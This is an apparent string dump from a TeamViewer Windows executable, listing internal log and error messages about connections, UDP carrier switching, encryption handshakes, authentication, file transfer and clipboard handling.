CT.CmdUDPFlowControl: ParentGateway is NULL!
CT.CheckQueueForFollowingPackets: ParentGateway is NULL!
CT.CmdDataAckPacket: ParentGateway is NULL!
CMD_ROUTE_CMD_TO_CLIENT invalid length
CConnectionThread::CmdData() packet dropped because PacketID=%1% >> LastPacketReceived()=%2%
CConnectionThread::ProcessBuddyCommandClient() bcmd.Deserialize2():
CConnectionThread::ProcessBuddyCommandClient() bcmd.Deserialize2(): Discarding command! First 1024 Bytes:
CConnectionThread::ProcessBuddyCommandClient(): bcmd.Deserialize1():
CConnectionThread::CmdNewMasterlogin(): WaitTime %1%ms
CConnectionThread::CmdNewMasterlogin(): WaitTime %1%ms and Flags: %2%
CConnectionThread::CmdNewMasterlogin(): cmd too short, length=%1%
CConnectionThread::CmdBuddy(): SendCCmdToOwnKeepAlive failed
CConnectionThread::ProcessBuddyCommandClient(): decrypt CMD_BUDDY_ENCRYPTED failed!
CConnectionThread::CmdBuddy() (PingRouter): Deserialize failed.
CConnectionThread::ProcessBuddyCommandClient(): g_buddySessionKey is NULL
CMD_PARTNERRECONNECT invalid length, %1% Bytes
CT.HandleRoutedCCommand: Session for user session %1% not found
CConnectionThread::CmdEndSession(): Received CMD_ENDSESSION with reason:
CMD_PARTNERRECONNECT invalid length
CT.ProcessCarrierSwitchRequest
Received CMD_BANDWIDTH_TEST, but BandwithEstimator is NULL!
CT.ProcessReceivedCommand: carrier switch: dropping command
CConnectionThread::CmdRequestRouteBuddy(): invalid SourceClientID=%1%
CConnectionThread::CmdRequestRouteBuddy(): Not incomming or ougoing connection
CConnectionThread::CmdRequestRouteBuddy() DeCryptBCommand failed!
CConnectionThread::CmdRequestRouteBuddy() bcmd.Deserialize()
CConnectionThread::CmdSessionId(): length < sizeof(tSessionID)
CConnectionThread::CmdEndSession(): length < sizeof(tEndSession)
CConnectionThread::PushCmdInSendQueue: SignalSock could not be created LE=
CT.ProcessCmdUDPFlushSendBuffer
CT.ProcessCmdUDPFlushSendBuffer: partner successfully flushed UDP send buffer
CT.ActivateRouterCarrier: ParentGateway is NULL!
CT.FlushSendQueueOverRouter: flushed send queue (%1% parts)
CT.ProcessCarrierSwitchFinished
CT.ForceCarrierActivation
CT.CmdUDPFlushSendBuffer()
COnlineNotificationDispatcher::Send() Couldn't register InstantSupport-Id %1% for reconnect, InstantSupportCommandHandler is NULL
COnlineNotificationDispatcher::Send() Register InstantSupport-Id %1% for reconnect
CStreamManager[%1%]::OutgoingTVCommand(): error StreamID=%2% KnownStream=%3% CmdType=%4%
CStreamManager[%1%]::JoinMeeting(): Participant=%2% key=%3%
CStreamManager[%1%]::IncomingStreamCommand(): cmd.ulLength=%2%, but headerlen=%3%
CStreamManager[%1%]::SendMeetingCommand(): bcmd serialize failed!
CStreamManager[%1%]::GetPrivateStreamID(): target==0 && stdPresenterList.empty()
CStreamManager[%1%]::IncomingStreamCommand(): cmd.ulLength=%2%
CStreamManager[%1%]::ReceivedCmdCongestionControl(): unexpected CommandType=%2%
ConnectionGuard: joined VC in sessions:
ConnectionGuard: joined meetings in sessions:
ConnectionGuard: joined support sessions in sessions:
InstantSupportCommandHandler: Received RequestConnection for session code %1% and client ID %2%
InstantSupportCommandHandler: Failed to deserialize meta data.
CInterProcessNetwork::RegisterInstantSupportSessionAfterRemoteReboot: IPC_Network is NULL
InstantSupportCommandHandler: Failed to deserialize notification data.
InstantSupportCommandHandler: Unknown session code %1% for client %2%.
InstantSupportCommandHandler: GUI process for client %1% is not running.
KeepaliveThreadServer.Select.Socket_Error:
KeepAliveThreadServer.ProcessData.Connection interrupted with client
KeepAliveThreadServer.ClientID
KeepAliveThreadServer CMD_TIMEOUT was not send properly
KeepAliveThreadServer.ProcessData.Not enough Data on socket for client
KeepAliveThreadServer.ProcessData.WrongMC for client
=KeepAliveThreadServer.Error.while.sending.KeepAliveBeeps.to.ClientID:
KeepAliveThreadServer received CMD_DISCONNECT from ClientID:
KeepAliveThreadServer.ProcessData.Receive failed for Client
Could not import certificate and key:
SendCmdsInQueue
CConnectionThread::SendClientStateToMaster(): SendCCmdToOwnKeepAlive failed
GWT.Send.Ignore.ErrorUDP, Err=
CT.Send.Failed
-> Push BuddyCmd in DelayedSendQueue
CConnectionThread::SendCmdsInSendQueue: Command could not be sent! Sending canceled. Size of SendQueue:
CT.Send.Destroying
CT.Send.Timeout
CT.Send.
CConnectionThread::SendDelayedSendQueueCommands(): Sent Cmd from DelayedSendQueue
CConnectionThread::SendCCmdToOwnKeepAlive: Cannot send BuddyCmd to OwnKeepAliveServer because KeepAliveThread is
CT.Connect to TeamViewer Router
CT.ConnectFailed:
CT.Connect.
CT.Connected
GWT.Receive.DatasizeExceeded
CT.Receive.Reconnecting nc_ret=%1%
GWT.Receive.WrongDataSize
CT.Receive.WrongDataSize commandlength=%1% bytesreceived=%2%. Dump(max 1KiB):
CT.Receive.
CT.Receive reconnect succeeded
CT.Receive reconnect failed
Activating support for ccmdV2
CT.Receive.Cmd2HeaderTooShort
CT.FillCommandWithData Sanity-check for header->offset failed. Dump of HeaderBuffer:
CT.FillCommandWithData Sanity-check for additionalHeaderLen failed. Dump of HeaderBuffer:
CT.Receive.WrongMC #
GWT.Receive.WrongMagicCode
GWT.SendUDPPunchRequest.SendFailed, Ret=
GWT.SendUDPPunches
GWT.SendUDPPunchRequest
GWT.SendUDPPunchRequest.GSFailed, Err=
SendUDPPunches: Skipping external MH pp=%1%, ppp=%2%
GWT.SendUDPPunches.SendLFailed, Err=
SendTCPHTTP: ConnectionThread is NULL!
SendTCPHTTP: ParentGateway is NULL!
CTU.GetConnectionMethod: router thread is NULL!
CTU.SetConnectionMethod: router thread is NULL!
GWT.SendUDPPings.PingFailed, Ret=
GWT.SendUDPPings.Ping0Failed, Ret=
GWT.SendUDPPings
CTU.Run.LoopEnd
CTU.Run.LoopEnd2
CTU.CmdConnectToWaitingthread.InitUDP
CTU.Run.RecFailed
CT.DoKeepAlive.Timeout.BeepFailed2
GWT.UDPInitPorts.ActiveFailed, Err=
DoKeepAlive.Send1.Failed, Err=
DoKeepAlive.Send2.Failed, Err=
SendUDPPunches: aborting after
GWT.SendUDPPunches.ExternalIP.empty
ConnectionUDP_
GWT.SendUDPPunches.SendRFailed, Err=
GWT.CmdUDPPing.UDPMasterReply
GWT.CmdUDPPing.PingOK.RequestUDP
CMD_UDPPING invalid length
CConnectionThread::CmdUDPPing()
GWT.CmdUDPPing.PingOK.PunchInit
GWT.CmdDisconnectSwitchToUDP.Rec
GWT.CmdSendmodeUDP.Rec
CTU.LostCarrierActivation
GWT.ProcessUDPGatewayCommand.UnknownCommand
CTU.CmdSendmodeUDP: ConnectionThread to router is NULL!
GWT.CmdSendmodeUDP.UDPreceiving31
GWT.CmdSendmodeUDP.PrepareSwitchToUDP.Send31.4
CmdSendmodeUDP.Failed, Err=
GWT.UDPFlowUDPSendPossible.Received
GWT.UDPFlowDisconnectSwitchedToUDP.Received
GWT.UDPFlowUDPPrepareSwitchToUDP.Received
GWT.UDPFlowMTUReceived.Received
UDP: large packets
GWT.UDPFlowUDPSendPossible.PrepareSwitchToUDP.Send2
=GWT.CmdUDPPing.MTUReceived
=GWT.CmdUDPPing.PunchIgnored state=
GWT.CmdUDPFlowControl.RequestUDP.Received
GWT.CmdUDPFlowControl.UnknownFlowControl
GWT.CmdUDPPing.UnknownUDPPing
CMD_UDPFLOWCONTROL invalid length
GWT.UDPFlowVersionHandshakeResponse.Received
GWT.UDPFlowVersionHandshakeResponse.InitUDP2
CTU.SendCarrierSwitchToUDP: routerThread is NULL!
GWT.SendDisconnectToUDPAndWaitForResponse
GWT.UDPFlowPunchReceived.Received
CTU.SendCarrierSwitchToUDP
CT.UDPFlowMTUReceived: ParentGateway is NULL!
GWT.UDPFlowMTUReceived.PrepareSwitchToUDP.Send
GWT.UDPFlowVersionHandshake.Received
GWT.UDPFlowVersionHandshake.SendFailed, Ret=
GWT.InitUDPPingVersionHandshake
GWT.InitUDPPingVersionHandshake.SendFailed, Ret=
CTU.HeartbeatLost: callDeputy is NULL!
CTU.HeartBeatLost: ParentGateway is NULL!
CTU.DetachPassiveCarrier
CConnectionThreadUDP::ApplyMasterDetachedFeatures: cannot deactivate passive carrier feature!
CConnectionThreadUDP::CmdUDPResendPackets() header is corrupted
CConnectionThreadUDP::CmdUDPResendPackets() headerSize is %1% bytes, expected bytes: %2%
CTU.CarrierSwitchFinishedCb: carrier switch failed
CTU.CarrierSwitchFinishedCb: callDeputy or routerThread is NULL!
CT.ActivateUDPCarrier: ParentGateway is NULL!
CConnectionThread::ReceiveUDPInternal(): repeated ReceiveDataUDP ok
CTU.SendDisconnectToUDPAndWaitForResponse: ConnectionThread to router is NULL!
Activating UDP carrier ...
CTU.CheckAndSetUDPPacketLossControl: gws is NULL!
Activating UDP packet loss control ...
CT.Receive.
CTU.CheckAndSetPassiveCarrier: gws is NULL!
CConnectionThreadUDP::CmdUDPResendPackets() received only %1% bytes, expected bytes: %2%
CConnectionThreadUDP::CmdUDPAckPackets() size is %1% bytes, expected bytes: %2%
CreateInstantSupportSession
CCreateInstantSupportSession::Start() Error=
CCreateInstantSupportSession::ConnectToRemote() PasswordVerifier/Salt empty!
CT.ConnectTeamViewer.ConnError.
m_GatewaySession.ConnectToRemote.Connected
KeyError
CCreateMeetingSession::Start(): could not get own private key!
%d-%m-%Y %H:%M:%S
PacketQueue.Totalsize=
CSignedAndCryptedSessionKeyV1::CreateSignedData: CreateSignature failed
CSignedAndCryptedSessionKeyV1::DecryptAndCheck: VerifySignature failed
CSignedAndCryptedSessionKeyV1::DecryptAndCheck(): wrong datalen=%1%
SignedAndCryptedSessionKey::FromBinaryData(): unknown version %1%
SignedAndCryptedSessionKey::FromBinaryData(): unexpected version 2
CSignedAndCryptedSessionKeyV3::Create(): Encrypt()
CSignedAndCryptedSessionKeyV3::Create(): Sign()
CSignedAndCryptedSessionKeyV3::DecryptAndCheck(): Verify()
CSignedAndCryptedSessionKeyV3::DecryptAndCheck: Verify failed
CSignedAndCryptedSessionKeyV3::DecryptAndCheck(): Decrypt()
CSignedAndCryptedSessionKeyV3::DecryptAndCheck(): wrong datalen=%1%
CmdConfirmEncryption: invalid encryption status %1%
CMD_REQUESTNOENCRYPTION rejected!
Received unexpected CMD_REQUESTENCRYPTION2!
Received unexpected CMD_REQUESTENCRYPTION!
\Microsoft Shared\MSInfo\msinfo32.exe"
dmsinfo.nfo
TVRouterClock::RequestRouterTime(): SendCCmdToOwnKeepAlive() failed
CUDPFirewallConsideration::GetDefaultGateways: GetAdaptersInfo failed with err=%1%
0Decrease max UDP punches to %1%
Found %1%, reducing max udp punches to %2%
CUDPFirewallConsideration::GetMACsOfDefaultGateways: SendARP failed for IP %1% with error %2%
EventSink.UpdateNetworkState: CoCreateInstance(NetworkListManager) failed with error %1%
EventSink.UpdateNetworkState: GetConnectivity failed with error %1%
EventSink.ListenForEvents: Unadvise failed with error %1% (facility %2%)
EventSink.ListenForEvents: QueryInterface failed with error %1% (facility %2%)
EventSink.ListenForEvents: CoCreateInstance failed with error %1% (facility %2%)
EventSink.ListenForEvents: EventSink thread already running
EventSink.ListenForEvents: Advise failed with error %1% (facility %2%)
EventSink.ListenForEvents: FindConnectionPoint failed with error %1% (facility %2%)
Negotiating session encryption: client hello sent to %1%, RSA key length = %2%
NegotiateEncryptionV2::CmdRequestEncryptionV2(): Deserialize failed!
Negotiating session encryption: client hello received from %1%, RSA key length = %2%
Negotiating session encryption: server handshake %1%, encryption established with AES key length 256
Encrypting and signing session key with RSA
RequestEncryption: partners public key not available
CmdRequestEncryption: invalid encryption status %1%
ConnectionThread.RequestEncryption: CryptoPP
Sending encrypted session key
RequestEncryption: ExportDecryptionKey failed!
RequestEncryption: ExportEncryptionKey failed!
Bit AES session key
CmdRequestEncryption(): session key not successfully decrypted!
CmdRequestEncryption(): Decrypt failed!
CmdRequestEncryption(): ImportDecryptionKey failed!
CmdRequestEncryption(): DecryptAndVerifySign failed!
CmdRequestEncryption: CryptoPP
Session key successfully decrypted, signature check ok
CmdRequestEncryption():ImportEncryptionKey failed!
Bit session key
CmdRequestEncryption(): invalid BitKeylen=%1%
CmdRequestEncryption(): unexpected length %1%
CmdRequestEncryption(): invalid CCommand length = %1%
CmdRequestEncryption(): GetSignatureKey for ID %1% failed!
CmdRequestEncryption(): invalid CryptedKeylen=%1%
CmdRequestEncryption(): unknown encryption mode %1%
Unhandled C exception at 0xX: Type unknown (Exception Code: 0xlX)
Unhandled C exception at 0xX: %S (Exception Code: 0xlX)
Thread pool handle exception at 0xx (Exception Code: 0xlX)
Heap corruption at 0xx (Exception Code: 0xlX)
Access violation at 0xx: Illegal read operation at 0xlX (Exception Code: 0xlX)
Access violation at 0xx: Illegal write operation at 0xlX (Exception Code: 0xlX)
Loading library DBGHELP.DLL failed with error
Unhandled exception at 0xx (Exception Code: 0xlX)
Stack overflow at 0xx (Exception Code: 0xlX)
Invalid parameter exception at 0xx (Exception Code: 0xlX)
DBGHELP.DLL
.mdmp
CAuthenticationSRP_Active, Step_Receive_ServerChallenge: cmdIn empty!
CAuthenticationSRP_Active, Step_Receive_ServerChallenge: FinishLogin() failed!
CAuthenticationSRP_Active, Step_Start: password is empty!
SessionPasswordText
SessionPasswordData
SendWindowsKeys
PresentationPassword
CachePasswords
BuddyLoginState
BuddyLoginTokenAES
BuddyLoginPWAES
BuddyLoginName
BuddyLoginFlags
BuddyLoginTokenID
BuddyLoginTokenSecretAES
AccessControl\Meeting_AC_Custom_JoinAMeetingAccess
MsgBoxDontShow\BuddyAddToBlacklist
MsgBoxDontShow\BuddyAddRemotebuddy
MsgBoxDontShow\BuddyAddSystem
MsgBoxDontShow\CloseClientControl
MsgBoxDontShow\WantToReconnect
MsgBoxDontShow\PasswordOnSessionEnd
MsgBoxDontShow\BuddyRegisterAccount
MsgBoxDontShow\UpdateIconSwitch
MsgBoxDontShow\AddPartner
MsgBoxDontShow\NoParticipants
MsgBoxDontShow\MonitorSwitch
MsgBoxDontShow\NewTabCreated
MsgBoxDontShow\NotificationIconSwitch
MsgBoxDontShow\BuddyAddQSUser
MsgBoxDontShow\BuddyAddUser
MsgBoxDontShow\TVServiceOnStartupDialog
MsgBoxDontShow\KeyInfoDialog
MsgBoxDontShow\ML33
MsgBoxDontShow\InstallMonitorDriver
MsgBoxDontShow\QuitWithAutostart
MsgBoxDontShow\NoConnectionAvailable
MultiMedia\AudioJBBehaviourLogging
MultiMedia\EnableLegacyVideoForWindows
MultiMedia\RemoteAudioBypassGate
CM_PartnerInstantSupportGroupName
ChangeDynamicPassword
CQS_LastInstantSupportSessionId
CM_SupportcaseLastDeleted
DeactivatedDynamicPassword
MsgBoxDontShow\MultiUser_InfoWindowConfirmation
CloudStorageTestWebservice
RemoteSupport_LastWindowPos
ConsoleUrlPrefix
Connections.txt
BitmapHelper.CopyRectangle: destination rectangle out of range
BitmapHelper.CopyRectangle: source rectangle out of range
PseudoSocket.Send
CLogin::runServer(): Partner TeamViewer ID == 0
Login.run: Read failed
Login.CheckIfConnectionIsAllowed: Partners version of TeamViewer (%1%.%2%) cannot connect to this TeamViewer
CLogin::CheckIfConnectionIsAllowed: ShareFilesWithMe not allowed - incoming SendFile denied!
Incoming connection denied (QuickJoin)
CLogin::CheckIfConnectionIsAllowed()
Login: connection not allowed, tv not visible
Login.CheckIfConnectionIsAllowed: Incoming video chat was blocked due to uncompatible client
Login.CheckIfConnectionIsAllowed: Incoming connection was blocked due to a hosted meeting
Login.CheckIfConnectionIsAllowed: Partners meeting version of TeamViewer (%1%) cannot connect to this meeting (%2%)
CLogin::run(): ConnectionMode == %1%
TVCmdConnectionMode: TVCmdConnectionMode_Mode missing
Login: AuthenticateServer failed
CLogin::runServer: Invalid token time: %1%
expected TVCmdConnectionMode, received %1%
Server object in CLogin::runServer() invalid. ChangeToServerMode() not processed.
Login::run(): wformat-Exception %1%
Login.CheckIfConnectionIsAllowed: Incoming connection from %1% denied, because TeamViewer is not visible
Login.AuthenticateServer: still blocked
CLogin::AuthenticateServer()
Login.CheckIfConnectionIsAllowed: DirectLANConnections not accepted
Login.CheckIfConnectionIsAllowed: incoming connections denied
Login.CheckIfConnectionIsAllowed: Security Access Level is
Login.CheckIfConnectionIsAllowed: GUI check timed out or cancelled
Login: connection not allowed, buddy account verification failed
CLogin::AuthenticateServer() socket was closed!
Login: Restart as admin disabled.
Login.WindowsAuthenticationServer: Login with windows user credentials disabled.
Login.WindowsAuthenticationServer: Could not get token for %1%\%2%.
CLoginServer::RunMainAuthenticationLoop: Invalid authentication method: %1%
expected TVCmdAuthenticate, received %1%
Login.AuthenticateServer: error reading challenge response
CLoginServer::ShowConnectionWarningIfNecessary ScammerBlocked command error: category %1% value %2%
LoginServer.ControlPasswordAuthenticationServer: decrypted control password is empty
LoginServer.ControlPasswordAuthenticationServer: could not decrypt control password
LoginServer.ControlPasswordAuthenticationServer: no fixed password set
Login.WindowsAuthenticationServer: The Security Limit Access Level denied incoming connection because user is not member of a Limit Access Group
Login.WindowsAuthenticationServer: User is not an administrator.
Login.WindowsAuthenticationServer CToken::Logon
Login.WindowsAuthenticationServer: User password insecure, login denied.
CLogin:The Security Limit Access Level denied incoming connection with TeamViewer Password Log in
LoginServer.AuthenticateServer: could not deserialize additional permanent passwords
LoginServer.AuthenticateServer: could not deserialize permanent password
Login.AuthenticateServer: authentication failed
CLoginServer::GetAuthenticationType: Got command with AuthenticationType::Invalid, using heuristic
Login.AuthenticateServer: zero sized auth response
RunLogin
CLogin::run()
CLogin::RunAuthenticationMethod(): unexpected command CC=%1% CT=%2%
CLogin::RunAuthenticationMethod(): reading inCmd failed, cancelling authentication
CLogin::RunAuthenticationMethod(): sending outCmd failed, cancelling authentication
CLogin::run() leave
MonitorInfo.GetMonitorInfoByIndex() Invalid monitor: iIndex=
Monitors: %1%, %2%, %3%x%4% (%6%,%7%), flags=%5%, dpi=%8%
GetKeyboardState failed Keypress (2)
GetKeyboardState failed in Keypress (1)
Changing keyboard layout to: %1%
GetKeyboardState failed OnKeyUp
SetWindowsHookEx() failed: %1%
Default keyboard layout: %1%
TVDesignHelper.Init: Bad lexical cast. No font offset size defined.
Win32_GUI::AddFont() Create font (Key:%1%) face %2% with charset %3%
Win32_GUI::AddFont() font (Key:%1%, charset:%2%) with face name %3% was mapped to %4%
TVAlphaDC.Init: buffer is NULL, Error: %1%
TVAlphaDC.Init(data): buffer is NULL, Error: %1%
TVAlphaDC.InitDC: SelectBitmap failed with error %1%
TVAlphaDC.InitDC: InitBitmap failed, Error: %1%
TVAlphaDC.MakeGrayscale: buffer is NULL. Error: %1%
TVAlphaDC.ChangeBrightness: buffer is NULL. Error: %1%
TVAlphaDC.DrawTextAlpha: TextDC buffer is NULL. Error: %1%
TVAlphaDC.BlitOnAlphaDC: TVAlphaDC not initialized. Error %1%
TVAlphaDC.InitDC: SetBkMode failed with error %1%
TVAlphaDC.InitDC: CreateDC failed with error %1%
TVAlphaDC.CalcOpaqueRegion: buffer is NULL. Error: %1%
TVAlphaDC.SetPixels: buffer is NULL. Error: %1%
TVBitmapHelper.UpdatePixelAlpha: buffer is NULL
TVBitmapHelper.SaveBitmapBMP: buffer is NULL
TVBitmapHelper.ResetBitmap: buffer is NULL
TVBitmapHelper.InitBitmap: CreateDIBSection failed with error %1%. DC %2%, BPP %3%, W %4%, H %5%, GDI count %6%
TVBitmapHelper.Blend: invalid ratio
TVBitmapHelper.Blend: buffer is NULL
TVBitmapHelper.PremultiplyAlpha: buffer is NULL
PrintingGUIInterface: received BCommand with unsupported Version
_desktop.exe
MachineHooks: Initiating Remote Drag&Drop Operation with id 0xx
SetThreadExecutionState failed with error %1%
AutoRecordingSettings::RemoteControl::IsEnabledForIncoming: Storage-Key for auto recording is not set
ddraw.dll
nmsvfw32.dll
d3d11.dll
dxgi.dll
d3d9.dll
LateBinding.Init: rich edit DLL could not be loaded, error %1%
Shcore.dll
Avicap32.dll
eGdi32.dll
dwmapi.dll
Wquartz.dll
Magnification.dll
uxtheme.dll
CAlertableMessageLoop::MsgWaitForSingleObjectAlertableIntern: wait returned unexpedted result %1%
CAlertableMessageLoop::MsgWaitForSingleObjectAlertableIntern: wait failed with error %1%
UserSettings::GetDynamicPassword: Predefined dynamic password is set (temp. SessionID = %1%, current SessionID = %2%, Console-SessionID = %3%)
UserSettings.GetCQSPassword: password could not be deserialized
UserSettings::GetDynamicPassword: dynamic password empty
UserSettings::GetDynamicPassword: no dynamic password set
UserSettings.GetDynamicPassword: password could not be deserialized
WindowsSessionStateManager::setLocalWindowsSessionInfo(): WTS_SESSION_LOCK
WindowsSessionStateManager::setLocalWindowsSessionInfo(): WTS_SESSION_LOGOFF
WindowsSessionStateManager::setLocalWindowsSessionInfo(): WTS_SESSION_LOGON
WindowsSessionStateManager::getWindowsSessionLocked(): locking state unknown.
WindowsSessionStateManager::getLocalUserLoggedIn(): login state is unknown - using ctoken fallback value %1%
WindowsSessionStateManager::setLocalWindowsSessionInfo(): WTS_SESSION_UNLOCK
WriteDesktopWallpaperInformation: Restoring desktop wallpaper: %s, %s
CLogin::NegotiateVersionServer wrong version length
CLogin::NegotiateVersionServer socket was closed while reading
CLogin::NegotiateVersionServer socket was closed while sending
CLogin::NegotiateVersionServer()
CLogin::NegotiateVersionServer version unknown %1%
CAuthenticationSRP_Passive, Step_Receive_VerifyClientSecret: clientSecret!=serverSecret
CAuthenticationSRP_Passive, Step_Receive_VerifyClientSecret: clientSecret.len!=serverSecret.len
CAuthenticationSRP_Passive, Step_Receive_VerifyClientSecret: clientSecret empty!
CAuthenticationSRP_Passive, Step_Receive_VerifyClientSecret: cmdIn empty!
CAuthenticationSRP_Passive, invalid step %1%
CAuthenticationSRP_Passive, Step_Receive_ClientData: CreateChallengeAndSecret failed!
CAuthenticationSRP_Passive, Step_Receive_ClientData: clientData empty!
CAuthenticationSRP_Passive, Step_Receive_ClientData: cmdIn empty!
CAuthenticationSRP_Passive, Step_Start: PasswordVerifier/Salt empty!
AuthenticationPublicKey_Passive::Verify: Verification failed with exception
AuthenticationPublicKey_Passive::Verify: Success
AuthenticationPublicKey_Passive::Verify: ChallengeResponse Missing
AuthenticationPublicKey_Passive::SendChallenge: preparing the MAC failed with exception
AuthenticationPublicKey_Passive::Verify: Permission Denied
AuthenticationPublicKey_Passive::SendChallenge: Invalid or No SourceID
AuthenticationPublicKey_Passive::SendChallenge: Invalid or No ManagementID
AuthenticationPublicKey_Passive::SendChallenge: Invalid TARGET: %1%, Possible IDs SESSION: %2% SERVER: %3% TSUSER: %4%
AuthenticationPublicKey_Passive::SendChallenge: Invalid or No TargetID
AuthenticationPublicKey_Passive::SendChallenge: could not encrypt challenge
AuthenticationPublicKey_Passive::SendChallenge: creating the key failed with exception
AuthenticationPublicKey_Passive::SendChallenge: no public key
AuthenticationPublicKey_Passive::SendChallenge: no right
TVMaskDC.Reset: buffer is NULL
PrintingPrinter::StartPrinting: supported data type: %1%
PrintingPrinter::StartPrinting: not supported data type: %1%
Account::TryAutoLogin: enabled: %1%
Account::TryAutoLogin: Failed due to wrong account state.
Account::SaveForOneTimeAutologin: saving data for update
Account::DeleteLoginSecret: Deleting token failed (timeout)
Account::DeleteLoginSecret: Deleting token failed: %1%
Account::DeleteLoginSecret: Deleting token succeeded
Account::TryAutoLogin: loginName=%1% password=%2% loginToken=%3% loginTokenID=%4%
Account::LoginInternal: Creating a login token failed
Account::LoginInternal: Login with V1 Account
Account::CreateLoginToken:
Account::ChangePassword: encryption error
Account::ChangePassword: Accoutn logged in, but no loginKey set
Account::LoginInternal: add accountkey
Account::LoginInternal: create encryption
Account::LoginInternal: Login with V2 Account
Account::SetLoginState: new state: %1%
LoginKeyStorage::SaveToStorage: saving login secret: password empty:%1% token empty:%2%
AccountLogin::Start: encryption error
AccountLogin::Start: AccountDyngate ID is 0
AccountLogin::Start: Trying account authentication
AccountLogin::HandleChallenge: Try V2Login
AccountLogin::OnResponseError: Unexpected error category
AccountLogin::OnResponseError: Unexpected error code
AccountLogin::OnResponseSuccess: Authentication successful
AccountLogin::HandleTfaChallenge() No tfaChallangeCB set
AccountLogin::HandleTfaChallenge: trying TFA Code
AccountLogin::HandleLegacyLogin: Try LegacyLogin
AccountLogin::HandleChallenge: encryption error
AccountLogin::Error: Authentication failed with error %1%
S5:TVCmdFT_ReceivedFilePackage::SendFileChunk failed
Received TVCmdFT_ReplyError
SendCommand failed of TVCmdFT_ReplyBeginFileTransfer.
SendCommand failed of TVCmdFT_ReplyNewFile.
SendCommand failed of TVCmdFT_ReplyEndFileTransfer.
There are no files to be sent. Report TVFTError_NoFiles.
Could not send TVCmdFT_ReplyDeleteStatus. OnDirectoryFound_DeleteThread
Could not send TVCmdFT_ReplyDeleteStatus. OnFindEnd_DeleteThread
SendCommand failed while sending TVCmdFT_ReplyNewFile.
SendCommand failed while sending TVCmdFT_ReceivedFilePackage.
A branch in ProcessUploadFileTransferCommands was executed. But it is invalid!
Could not send TVCmdFT_ReplyDeleteStatus. OnFindFile_DeleteThread
FileTransferThreadServer.ProcessUploadFileTransferCommands.TVCmdFT_ReplyNewFile GetFileAttributeData
FileTransferThreadServer.ProcessUploadFileTransferCommands.TVCmdFT_ReplyNewFile: GetFileAttributeData
FileTransferThreadServer.OnTransfer_GetDir: More entries available! Total entries: %1%
FileTransferThreadServer.OnTransfer_GetDir: NetServerEnum failed with error %1%
FileTransferThreadServer.OnTransfer_GetDir: TVFTError_GetDirAccessDenied
SendCommand failed while sending TVCmdFT_Reply_GetDir.
SendCommand failed while sending TVCmdFT_Reply_Session.
CFileTransferThreadServer received TVCmdFT_ReplyError. But it was ignored.
...Received command is NOT valid. Ingoring. States are %1%
FileTransferThreadServer.OnTransfer_GetDir: TVFTError_GetDir
DataTransmissionSink: Received malformed FileChunks.FinRequest packet
DropTarget: could not query/get stream, 0xx
DropTarget: could not query/get data, 0xx
DropTarget: required Interface not supported
BCommand.AddParamPathList: access to '%1%' denied
(TVCmdFT_ReplyError) File download could not be done because the resume type (%1%) is invalid.
SendCommand failed while sending TVCmdFT_ReplyBeginFileTransfer.
A call to m_File.Open failed.
SendCommand failed while sending TVCmdFT_ReceivedFilePackage
SendCommand failed while sending TVCmdFT_RequestSession.
FileTransferThreadClient.ProcessDownloadFileTransferCommands.TVCmdFT_ReplyNewFile GetFileAttributeData
S2: TVCmdFT_ReplyNewFile::SendFileChunk failed
The command TVCmdFT_Abort was received while uploading. Ignored.
SendCommand failed while sending TVCmdFT_ReplyNewDirectory.
SendCommand failed while sending TVCmdFT_ReplyEndFileTransfer.
CFileTransferThreadClient.FileSumThread
CFileTransferThreadClient.FileUploadThread
FileTransferThreadClient.OnFileFound_UploadThread: %1%
FileTransferThreadClient.OnFileFound_UploadThread: GetFileAttributeData
SendCommand failed while sending TVCmdFT_ReplyNewFile.
SendCommand failed while sending TVCmdFT_ReplyError.
RecursiveFindFile.searchInDirectory: FindNextFile error %1%
DT: DataTransceiverInstanceTVStreams: %1% is no TVCmdDataTransceiverInfos command
DT: DataTransceiverInstanceTVStreams: TVCmdDataTransceiverInfos had wrong DestinationID: %1% instead of %2%
DT: DataTransceiverInstanceTVStreams: could not process TVCmdDataTransceiverChunks command
DT: DataTransceiverInstanceTVStreams: TVCmdDataTransceiverInfos had an no DestinationTransceiverID.
DT: DataTransceiverInstanceTVStreams: received TVCmdFileChunks_FinFile_Ok for invalid file, file has already be removed
DataTransceiver.CallGuiCallback: callback empty
DataTransmissionSource: Received possibly malformed FileChunks.FinSession packet, maybe access denied, error or undefined
DragDropInvoker: Started Async Operation
DragDropInvoker: Operation Finished
DragDropInvoker: left DoDragDrop 0xx
DragDropInvoker: Operation was not accepted by target and aborted synchronously
DragDropInvoker: Pure Invoker Operation failed 0xx
DragDropInvoker: Pure Invoker Operation
DragInvokerMsgWndClass
DragInvokerMsgWnd
no dynamic package size supported
no dynamic package size and send ahead supported
no bundling of data supported
no dynamic send ahead supported
com.teamviewer.TVClipboard
:Zone.Identifier
FileWriter: unable to delete file in abort operation
FileWriter: unable to delete file in abort operation: %1%
InvokerHelperFrontend: hanging invoker helper 0xx
InvokerHelperFrontend: invalid Response 0xx, %i
dInvokerHelperFrontend: Response to Enter Loop 0xx!
InvokerHelperFrontend: Response to Block 0xx (%s)!
{83E07D0D-0C5F-4163-BF1A-60B274051E40}Windows Bitmap
ClipboardFileContentHandlerWin::CreateFileGroupDescriptor: Filesize too big. Not supported: %1%. Max size: %2% bytes
%1%_%2%_%3%.txt
com.teamviewer.clipboard.rtf
com.teamviewer.clipboard.file-contents
com.teamviewer.clipboard.html
com.teamviewer.clipboard.unicode-plain-text
com.teamviewer.clipboard.image
com.teamviewer.clipboard.file-group-descriptor
ClipboardConversionWin::CreateDIBFromCommonImageFormat: Failed to create windows bitmap
ClipboardConversionWin::CreateDIBFromCommonImageFormat: Failed to get windows bitmap stream size
ClipboardConversionWin::CreateWindowsBitmapFromCommonImageFormat: No png given
ClipboardConversionWin::CreateWindowsBitmapFromCommonImageFormat: Failed to create input stream %1%
ClipboardConversionWin::CreateWindowsBitmapFromCommonImageFormat: Failed to create bitmap from png
ClipboardConversionWin::CreateWindowsBitmapFromCommonImageFormat: Failed to save bitmap
ClipboardConversionWin::CreateCommonImageFormatFromWindowsBitmap: bitmap stream empty
ClipboardConversionWin::CreateCommonImageFormatFromWindowsBitmap: Failed to create input stream %1%
ClipboardConversionWin::CreateCommonImageFormatFromWindowsBitmap: Failed to create bitmap
ClipboardConversionWin::CreateCommonImageFormatFromWindowsBitmap: Failed to save bitmap as png
CSendFileModule_Base::GetDataTransceiverAndSocket: remote support session invalid!
CSendFileModule_Base::ShutdownSession: shutdown already in progress or blocked by abort operation ...
